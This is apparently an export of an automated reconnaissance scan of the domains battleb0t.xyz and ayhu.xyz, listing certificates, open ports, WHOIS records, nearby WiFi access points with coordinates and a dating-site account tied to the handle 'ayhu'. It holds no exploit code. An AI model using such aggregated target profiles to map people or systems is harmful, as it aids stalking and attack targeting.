d: '2ToLICUBPb7XpOOLU5MHBc4J5yG0oheUGtehN/w3ZVsFmzDAbOvCroJJwwrRkjNV6Tn52KN/9nB7B8sz2NSv9/9dxRAmoEg1HGzmozU2NACMuujm6XlVF5ozcbqn9ZBfwSat/mPFIuXurAISwgnINkk9AtugcpCUQHziQl+hs46Tkaidb6rhmNGYloX58NMp6/dt44yfsmywuLVXcAFkah1saaFWiETNA22oPOLsKwdZLjZF/57cZ6U7IE+U9u08hSy2LwMl1S56XHXIPlPdXyU5wEzETE40l9LPy3liHtZ+0sFpGwOEjIvxrQ5T+yTbOd6FLXQq2biCWHdXzGq4q/Z6wpMSuxwTK5+LQiEDYzatOhFmeim8d5on6i6XRRqVjrZwVw7DnLXOPTyWGBSUGsicd01O/2CEnxT4kImRgcQduMx6bhGCiOWw7czbee4tF0zlsS59dzRB//Ht7dvKhDA88UnMm0xLzbHkJ9p9hx93IVifAjtUzWhW/2Y09mfOKl8wDJzjQdRxKsjlPBcyuT+2r0jZJkNDjSBjms0IuC9kDZ1UDHsrKoZzpFM/Of20',
t: 'MTY4Mzg2MDA1My41OTUwMDA=',
m: '5/J7gGK8XmEBWkArTjJaJQpVmCj5kenNaxHbI91xZvc=',
i1: 'd1xtl4gFAsGt/e5zgSdIvg==',
i2: 'L38k4kp9xxsqGxDFehGWAg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6036feab195d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6036feab195d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:59:34 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:88:a7:3c:db:48:4e:7a:5b:30:55:60:8f:23:20:34:8b:3f
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 19:16:54 2022 GMT
Not After : Mar 13 19:16:53 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:3c:4c:c6:51:31:a3:0e:29:e8:d9:ba:56:72:
ca:d6:92:a9:ca:6b:b2:16:4e:5d:b5:eb:62:3f:02:
41:f1:08:06:a9:cd:7b:f9:04:b2:4c:8e:fb:65:31:
b3:75:c9:6a:7a:3f:e2:3e:46:f0:3e:66:e4:c8:3d:
cb:d8:17:7d:09:c3:b8:4b:0b:d8:99:0b:f7:8b:94:
1b:46:cc:ac:01:f0:8a:0c:c3:ce:98:ae:96:9a:d8:
ee:30:0d:83:be:56:f2:fa:d2:51:6c:e6:b5:3d:4d:
38:62:17:66:35:98:3b:99:b8:ad:43:ad:7a:14:a8:
2a:90:0e:e4:de:5f:31:31:ab:48:0a:dd:2d:64:89:
33:f3:db:a0:b1:f9:a9:c3:da:71:2f:32:05:fa:a1:
40:b4:5f:a2:f6:e5:8b:5d:99:bb:a1:c7:ff:78:70:
fa:fe:96:c0:01:b6:36:4c:98:38:f0:fd:c2:63:a9:
72:11:2f:85:1a:a3:bf:b4:96:2f:f2:45:ce:b3:c4:
6b:ba:0f:b8:a2:6a:78:27:5b:76:b0:c8:42:4e:41:
26:4e:0a:34:15:4a:e9:08:7d:32:c0:a0:48:38:a7:
68:49:b9:00:6e:d4:89:04:f8:ea:e6:dc:02:c0:03:
83:f0:7d:9a:bd:81:f3:1a:7f:93:46:db:06:a1:a5:
91:0f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
11:21:5C:1E:81:22:95:8E:F4:BA:FB:D4:B0:77:CD:45:5F:AE:5E:B1
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
76:8a:75:f9:43:a0:e6:61:ea:e3:d4:27:72:39:cb:37:97:94:
6f:0e:14:84:fa:37:4d:a2:29:74:5d:9f:6a:9b:90:69:30:fb:
fe:80:38:47:ab:f9:93:8b:07:ed:9c:23:7a:ce:61:de:37:2c:
b5:38:61:3d:a2:a5:6a:7f:07:4e:90:cc:90:cb:f2:dc:3b:dd:
dc:6e:3d:eb:d5:9b:14:fa:58:fe:7c:53:e1:b8:07:86:02:8a:
6d:b2:53:6a:62:fd:74:1a:77:7e:1a:08:43:f8:18:7a:01:9e:
20:be:c4:45:2e:93:39:21:97:6b:7c:a2:a3:23:1c:fb:d7:fc:
ec:c5:e8:7e:b5:d7:d0:a7:3e:34:ed:91:4c:0f:7d:41:20:d6:
ae:b8:3c:8e:a2:12:49:dc:0d:d5:4c:94:96:63:8e:08:ef:7b:
64:6f:6d:f3:52:e2:36:f2:d4:c5:56:d5:b4:44:ce:06:c1:8d:
33:fb:3d:55:2f:89:df:1e:0c:e0:e0:b5:24:7c:d7:b7:f3:8a:
0e:7c:13:62:fd:45:98:d9:2b:25:ae:f4:5e:83:23:b0:c0:02:
cf:69:26:2e:fd:59:16:e1:d9:9a:02:67:43:02:ef:d7:61:4a:
bd:23:13:4e:92:4d:8b:73:c9:d8:47:4a:c4:8f:e1:ca:a1:27:
eb:65:50:df
| ayhu.xyz |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | webdisk.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
| 2023-05-12 02:52:08 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:96:9b:29:e7:ba:1f:ed:f3:53:36:ca:2c:46:93:27:46:97
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:44:09 2022 GMT
Not After : Mar 13 15:44:08 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:26:42:72:54:54:74:21:1e:c0:7a:66:54:5a:
e8:26:8a:a7:bb:78:e0:52:09:b4:70:cd:bc:21:4b:
2c:77:39:63:f4:67:8f:19:31:3e:f0:0f:58:55:9d:
80:0d:29:74:7f:66:1f:df:6c:0f:e4:7c:f2:b1:63:
d3:73:4b:d0:8e:1c:94:d5:39:9f:87:08:c9:39:28:
06:18:ff:8b:b4:c8:13:46:ac:cf:6d:a5:8c:43:a0:
09:d6:74:e4:1b:e6:a1:90:6d:22:b3:ba:58:9d:f7:
79:37:55:b1:58:ef:15:cb:64:d0:30:b0:3c:9c:57:
0f:fe:6c:6b:bb:3f:27:84:33:78:b0:19:92:bf:97:
a6:0f:20:d5:97:af:a6:3b:9d:2c:b6:18:1b:80:b6:
fb:2e:b9:e7:44:40:3a:ab:de:d1:27:94:5c:98:f3:
69:c6:eb:0a:ba:59:dd:58:0a:8d:f7:6b:71:2d:96:
80:0b:9a:05:20:72:48:c7:59:11:c0:d5:98:a3:64:
8a:78:35:12:8b:20:64:de:10:73:21:62:d5:82:94:
42:92:41:f0:40:98:0d:fd:64:08:ef:ba:99:48:1d:
ae:86:bd:de:46:1e:c7:72:49:3d:93:76:b8:e9:ff:
0d:e2:5c:31:61:a9:f2:59:1c:92:cb:56:9f:9b:f7:
48:28:35:ef:e1:4f:ae:4c:d6:6f:39:80:a0:50:ab:
78:66:96:ff:8d:78:93:50:2d:b7:0a:ef:fe:70:44:
cf:d9:e4:4f:5e:34:97:d6:93:af:d9:54:30:40:86:
24:9c:59:46:7c:df:86:e9:5e:eb:17:7f:95:e4:0e:
70:f5:5a:35:d4:64:cb:b9:5b:5c:bb:45:e6:4e:80:
a3:6d:83:42:86:a4:44:3b:83:c2:1d:e2:02:99:d0:
36:4c:c3:91:eb:69:38:a7:7d:2f:35:65:33:3e:23:
0b:5d:1b:0c:01:a1:10:75:e2:ac:bb:3b:bf:f6:2f:
ec:4e:98:ec:53:ee:86:34:4c:69:d1:38:5c:a9:07:
72:79:62:64:81:ea:03:fc:2f:18:db:04:b6:04:36:
1d:bc:01:56:0e:d9:49:1c:dd:41:11:ce:34:13:0f:
13:81:d8:cd:71:a3:fc:76:2b:ea:14:1c:8d:38:63:
54:f1:73:9f:26:18:47:68:79:40:b9:a0:ac:b7:d2:
e0:a8:36:94:6f:0c:c3:56:34:6a:ee:a7:97:c4:d3:
0b:44:a3:56:87:d8:dc:ce:f3:89:8c:09:62:1a:25:
1f:dd:5f:2a:c0:d4:a9:14:4f:34:09:bc:53:d5:35:
be:6b:0d:6a:49:bf:0b:11:66:23:11:60:25:c5:db:
56:15:5d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:E8:B3:AA:B6:B4:6A:08:8C:66:4E:1B:FC:F4:D4:C0:C8:AD:D7:A5
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
23:97:7b:03:b9:f4:a4:34:12:d3:21:3d:da:44:f5:20:c3:b1:
3b:ac:6b:d9:60:b8:b7:69:bb:7a:12:d5:25:8c:0f:00:de:f7:
36:a4:48:3c:17:0b:8b:18:53:7e:62:90:c7:ad:c4:3d:35:34:
7d:53:88:f9:54:65:04:22:df:53:b4:19:52:e4:bc:5e:0b:03:
2b:1e:62:32:2a:0c:d4:df:76:d7:3c:d0:ee:2e:d6:fe:2e:91:
01:8b:82:92:c3:06:53:df:e0:c5:5e:14:ca:21:52:f8:77:c2:
63:cb:6d:04:c8:e2:63:8d:d8:f2:81:13:be:86:29:78:4d:d3:
15:f3:e6:0d:45:f1:0a:26:81:2a:91:e1:c5:11:de:38:7b:0c:
cf:72:df:63:25:33:a6:15:a5:be:c2:1d:86:c1:1d:1c:dc:30:
fc:22:c3:9f:a9:fa:7c:dd:a4:c0:3b:50:98:18:64:aa:5a:5b:
60:a4:a5:3e:e0:2c:e4:d0:4b:8a:7e:bc:80:27:a1:5e:d2:25:
b1:27:e5:25:2c:1a:a2:db:28:f3:fa:2d:33:78:d3:45:4c:a4:
5f:a1:7f:85:be:04:d2:fe:95:ff:fd:b1:53:9f:47:43:cf:75:
33:c3:8e:7b:1a:d7:d7:ca:fd:b4:9d:e3:3d:6e:15:33:3e:ee:
1e:db:28:8f
| battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:79:1E:5C) | 34.0544, -118.244 |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | 01def.io | 64.226.81.48 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | swwlan (Net ID: 00:02:2D:18:2C:14) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:46:49 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:64:c3:ab:83:a1:9f:9b:f7:ff:e5:00:bf:41:ae:
cd:d1:cd:1c:5d:8d:4d:62:fb:0e:e4:90:33:13:2d:
b5:45:91:e6:7a:26:a0:5e:01:ae:25:84:fb:d5:88:
23:7e:13:7e:a9:d3:a5:de:69:2d:91:69:c3:12:86:
5a:94:02:42:28
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:31:BA:E4:35:B8:DF:14:C3:99:B3:D0:FB:
C6:93:77:5C:5A:D1:E2:7C:62:90:83:BB:77:59:14:17:
00:CD:14:09:02:21:00:A0:89:29:6C:06:8B:80:0E:58:
FD:7C:72:66:63:BF:84:90:99:2F:F3:90:6D:39:BD:86:
6C:21:15:5D:B2:9C:A1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:85:6B:1A:5F:D3:6B:D9:52:36:0B:
44:9B:B7:9C:FF:8D:70:8C:F4:D1:34:69:3C:10:D4:AD:
03:93:DD:F1:A4:02:21:00:C0:7F:F8:B3:01:C9:63:4D:
D3:D5:2B:F6:46:B5:04:38:1F:2D:8A:D9:5F:C8:07:F8:
5D:FA:B6:44:79:49:3C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:87:5E:CF:47:90:E0:B2:0D:AA:FC:5D:
58:AA:C9:7E:AE:76:49:89:1E:EB:25:CD:66:CC:A5:23:
F6:24:7A:AE:07:02:20:5E:32:A3:09:9E:48:84:4A:A9:
3B:C0:AA:53:22:AB:E0:9A:BF:4F:DB:FB:66:C2:2B:F8:
4E:E8:E8:BE:9A:FD:22
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:a8:8f:12:1b:fa:2f:f4:cc:aa:04:9b:b9:ea:
95:f5:30:5a:59:f6:f8:b4:4d:b6:51:7e:89:b3:c8:92:7a:7e:
80:c0:81:be:6e:38:4e:5e:5a:7d:bb:10:72:ae:d7:11:5f:02:
31:00:fc:dd:52:7b:4b:33:ad:13:21:0b:b3:8a:93:5d:fb:03:
ac:f0:f4:f6:55:46:ed:1e:45:14:60:d2:47:04:5f:56:a0:b6:
8d:b8:c7:6a:0b:fd:73:a6:07:2b:fa:b2:e2:49
| 35.229.48.116 |
| 2023-05-12 02:54:41 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.196.30.220:80 | 104.196.30.220 |
| 2023-05-12 03:01:29 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://fluid.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://fluid.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-cache-status,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] | fluid.battleb0t.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | interpals (Category: dating)
https://www.interpals.net/ayhu | ayhu |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.133): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Allstate 5G (Net ID: 00:02:6F:F8:0A:41) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@namecheap.com | Domain Name: BATTLEBOT.XYZ
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2022-09-05T15:48:14.0Z
Creation Date: 2020-09-07T05:35:36.0Z
Registry Expiry Date: 2023-09-07T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: battlebot.xyz
Registry Domain ID: D199559633-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-08-08T05:51:35.56Z
Creation Date: 2020-09-07T05:35:36.00Z
